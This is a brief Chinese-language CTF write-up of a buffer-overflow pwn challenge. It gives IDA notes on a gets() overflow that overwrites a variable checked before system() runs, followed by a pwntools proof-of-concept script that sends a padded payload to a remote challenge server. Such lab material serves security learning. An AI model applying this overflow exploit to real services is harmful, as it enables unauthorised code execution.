1,三连
2,IDA
分析:gets(v4)溢出点,check(v5)=1则执行system();
分析:a1=v5,check(v5)=1的前提是for循环正常退出,即v5=n0t_r3@11y_f1@g
思路:通过v4溢出覆盖控制v5。
满足条件原因:
填充长度0x30:
3,poc
from pwn import *
context.log_level="debug"
r=remote("node4.buuoj.cn",28803)
payload='a'*0x30+"n0t_r3@11y_f1@g"
r.sendline(payload)
r.interactive()